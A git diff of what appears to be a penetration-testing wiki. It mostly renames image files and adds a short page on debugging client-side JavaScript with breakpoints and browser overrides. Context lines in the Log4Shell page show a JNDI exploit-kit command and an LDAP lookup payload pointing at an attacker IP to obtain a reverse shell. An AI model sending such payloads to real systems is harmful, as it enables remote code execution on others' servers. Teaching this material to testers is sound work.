diff --git a/.gitbook/assets/image (642) (1) (1) (1).png b/.gitbook/assets/image (642) (1) (1) (1).png
index 4e69d4e12..20ad1b02d 100644
Binary files a/.gitbook/assets/image (642) (1) (1) (1).png and b/.gitbook/assets/image (642) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (642) (1) (1).png b/.gitbook/assets/image (642) (1) (1).png
index 20ad1b02d..fa15a92ce 100644
Binary files a/.gitbook/assets/image (642) (1) (1).png and b/.gitbook/assets/image (642) (1) (1).png differ
diff --git a/.gitbook/assets/image (642) (1).png b/.gitbook/assets/image (642) (1).png
index fa15a92ce..2528d1e23 100644
Binary files a/.gitbook/assets/image (642) (1).png and b/.gitbook/assets/image (642) (1).png differ
diff --git a/.gitbook/assets/image (642).png b/.gitbook/assets/image (642).png
index 2528d1e23..aa4339870 100644
Binary files a/.gitbook/assets/image (642).png and b/.gitbook/assets/image (642).png differ
diff --git a/.gitbook/assets/image (648) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (648) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..0c6b45feb
Binary files /dev/null and b/.gitbook/assets/image (648) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (648) (1) (1) (1) (1).png b/.gitbook/assets/image (648) (1) (1) (1) (1).png
index 0c6b45feb..cca181996 100644
Binary files a/.gitbook/assets/image (648) (1) (1) (1) (1).png and b/.gitbook/assets/image (648) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (648) (1) (1) (1).png b/.gitbook/assets/image (648) (1) (1) (1).png
index cca181996..ebba66d4f 100644
Binary files a/.gitbook/assets/image (648) (1) (1) (1).png and b/.gitbook/assets/image (648) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (648) (1) (1).png b/.gitbook/assets/image (648) (1) (1).png
index ebba66d4f..8b033a5a5 100644
Binary files a/.gitbook/assets/image (648) (1) (1).png and b/.gitbook/assets/image (648) (1) (1).png differ
diff --git a/.gitbook/assets/image (648) (1).png b/.gitbook/assets/image (648) (1).png
index 8b033a5a5..8cd6e7805 100644
Binary files a/.gitbook/assets/image (648) (1).png and b/.gitbook/assets/image (648) (1).png differ
diff --git a/.gitbook/assets/image (648).png b/.gitbook/assets/image (648).png
index 8cd6e7805..aa4339870 100644
Binary files a/.gitbook/assets/image (648).png and b/.gitbook/assets/image (648).png differ
diff --git a/.gitbook/assets/image (649) (1) (1) (1).png b/.gitbook/assets/image (649) (1) (1) (1).png
new file mode 100644
index 000000000..1e2588800
Binary files /dev/null and b/.gitbook/assets/image (649) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (649) (1) (1).png b/.gitbook/assets/image (649) (1) (1).png
index 1e2588800..0ebce7d02 100644
Binary files a/.gitbook/assets/image (649) (1) (1).png and b/.gitbook/assets/image (649) (1) (1).png differ
diff --git a/.gitbook/assets/image (649) (1).png b/.gitbook/assets/image (649) (1).png
index 0ebce7d02..593cd074f 100644
Binary files a/.gitbook/assets/image (649) (1).png and b/.gitbook/assets/image (649) (1).png differ
diff --git a/.gitbook/assets/image (649).png b/.gitbook/assets/image (649).png
index 593cd074f..12af8d472 100644
Binary files a/.gitbook/assets/image (649).png and b/.gitbook/assets/image (649).png differ
diff --git a/README.md b/README.md
index 74a279a99..66ebe5d41 100644
--- a/README.md
+++ b/README.md
@@ -32,7 +32,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [STM Cyber](https://www.stmcyber.com)
 
-![](<.gitbook/assets/image (642) (1) (1).png>)
+![](<.gitbook/assets/image (642) (1) (1) (1).png>)
 
 [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.
 
diff --git a/SUMMARY.md b/SUMMARY.md
index 6f48726ec..8d00d7564 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -464,6 +464,7 @@
 * [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
   * [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md)
   * [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
+  * [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
   * [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
   * [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
   * [Iframes in XSS and CSP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
diff --git a/cloud-security/gitea-security/basic-gitea-information.md b/cloud-security/gitea-security/basic-gitea-information.md
index aa6b5108d..5bf3b96bd 100644
--- a/cloud-security/gitea-security/basic-gitea-information.md
+++ b/cloud-security/gitea-security/basic-gitea-information.md
@@ -32,7 +32,7 @@ When creating a new team, several important settings are selected:
   * **Administrator** access
   * **Specific** access:
 
-![](<../../.gitbook/assets/image (648).png>)
+![](<../../.gitbook/assets/image (648) (1).png>)
 
 ### Teams & Users
 
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index d3618093a..e215b8921 100644
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -338,7 +338,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
 
-![](<../../.gitbook/assets/image (642) (1).png>)
+![](<../../.gitbook/assets/image (642) (1) (1).png>)
 
 Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/qvrxbu}`**
 
diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index 066f5a5b9..7cc78994b 100644
--- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -36,7 +36,7 @@ This is exactly the same technique as before, but checking the requests James no
 
 In this case **the header Transfer-Encoding was injected**.
 
-![](<../../.gitbook/assets/image (648) (1) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1) (1) (1) (1).png>)
 
 ### H2.TE via Header Name Injection
 
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index bc7eb5ebc..db86b3ddb 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -112,7 +112,7 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
 
 He will send a **exploit** like:
 
-![](<../.gitbook/assets/image (649) (1) (1).png>)
+![](<../.gitbook/assets/image (649) (1) (1) (1).png>)
 
 After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
 
diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index ff2b99d7b..64a9efdc8 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -66,7 +66,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
 
-![](<../../.gitbook/assets/image (649) (1).png>)
+![](<../../.gitbook/assets/image (649) (1) (1).png>)
 
 ### Domain Parser
 
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index fc7dd1268..f8d7f2f37 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -25,6 +25,12 @@
 4. If **used**:
    1. You could exploit a **DOM XSS**, pay attention how your input is controlled and if your **controlled input is used by any sink.**
 
+When working on a complex XSS you might find interesting to know about:
+
+{% content-ref url="debugging-client-side-js.md" %}
+[debugging-client-side-js.md](debugging-client-side-js.md)
+{% endcontent-ref %}
+
 ## Reflected values
 
 In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
diff --git a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
new file mode 100644
index 000000000..7d8bc7f06
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -0,0 +1,26 @@
+# Debugging Client Side JS
+
+Debugging client side JS can be a pain because every-time you change the URL (including a change in the params used or param values) you need to **reset the breakpoint and reload the page**.
+
+### `debugger;`
+
+If you place the line `debugger;` inside a JS file, when the **browser** executes the JS it will **stop** the **debugger** in that place. Therefore, one way to set constant breakpoints would be to **download all the files locally and change set breakpoints in the JS code**.
+
+### Overrides
+
+Browser overrides allows to have a local copy of the code that is going to be executed and execute that one instead of the one from the remote server.\
+You can **access the overrides** in "Dev Tools" --> "Sources" --> "Overrides".
+
+You need to **create a local empty folder to be used to store the overrides**, so just create a new local folder and set is as override in that page.
+
+Then, in "Dev Tools" --> "Sources" **select the file** you want to override and with **right click select "Save for overrides"**.
+
+![](<../../.gitbook/assets/image (649).png>)
+
+This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
+
+![](<../../.gitbook/assets/image (642).png>)
+
+## References
+
+* [https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s](https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s)
diff --git a/todo/hardware-hacking/radio.md b/todo/hardware-hacking/radio.md
index b2b692dcc..fa8d9b3fd 100644
--- a/todo/hardware-hacking/radio.md
+++ b/todo/hardware-hacking/radio.md
@@ -113,7 +113,7 @@ You can also indicate the number of symbols you are going to select and SigDigge
 
 Having found this is an **AM modulated** signal and the **symbol rate** (and knowing that in this case something up means 1 and something down means 0), it's very easy to **obtain the bits** encoded in the signal. So, select the signal with info and configure the sampling and decision and press sample (check that **Amplitude** is selected, the discovered **Symbol rate** is configured and the **Gadner clock recovery** is selected):
 
-![](<../../.gitbook/assets/image (642).png>)
+![](<../../.gitbook/assets/image (642) (1).png>)
 
 * **Sync to selection intervals** means that if you previously selected intervals to find the symbol rate, that symbol rate will be used.
 * **Manual** means that the indicated symbol rate is going to be used
@@ -132,7 +132,7 @@ If there would have been for example **4 different levels of amplitude**, you sh
 
 Finally **increasing** the **Zoom** and **changing the Row size** you can see the bits (and you can select all and copy to get all the bits):
 
-![](<../../.gitbook/assets/image (649).png>)
+![](<../../.gitbook/assets/image (649) (1).png>)
 
 If the signal has more than 1 bit per symbol (for example 2), SigDigger has **no way to know which symbol is** 00, 01, 10, 11, so it will use different **grey scales** the represent each (and if you copy the bits it will use **numbers from 0 to 3**, you will need to treat them).
 
@@ -160,7 +160,7 @@ This is because I capture the signal in booth frequencies, therefore one is appr
 
 If the synchronized frequency is **closer to one frequency than to the other** you can easily see the 2 different frequencies:
 
-![](<../../.gitbook/assets/image (648) (1) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1) (1).png>)
 
 ![](<../../.gitbook/assets/image (634).png>)
 
diff --git a/todo/hardware-hacking/spi.md b/todo/hardware-hacking/spi.md
index dcde9c086..2eeba48f7 100644
--- a/todo/hardware-hacking/spi.md
+++ b/todo/hardware-hacking/spi.md
@@ -10,7 +10,7 @@
 
 Note that even if the PINOUT of the Pirate Bus indicates pins for **MOSI** and **MISO** to connect to SPI however some SPIs may indicate pins as DI and DO. **MOSI -> DI, MISO -> DO**
 
-![](<../../.gitbook/assets/image (648) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1).png>)
 
 In Windows or Linux you can use the program [**`flashrom`**](https://www.flashrom.org/Flashrom) to dump the content of the flash memory running something like:
 
diff --git a/todo/hardware-hacking/uart.md b/todo/hardware-hacking/uart.md
index b040dc67b..7781780ec 100644
--- a/todo/hardware-hacking/uart.md
+++ b/todo/hardware-hacking/uart.md
@@ -8,7 +8,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
 
 We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
 
-![](<../../.gitbook/assets/image (648) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1) (1) (1).png>)
 
 Hardware tools to communicate with UART: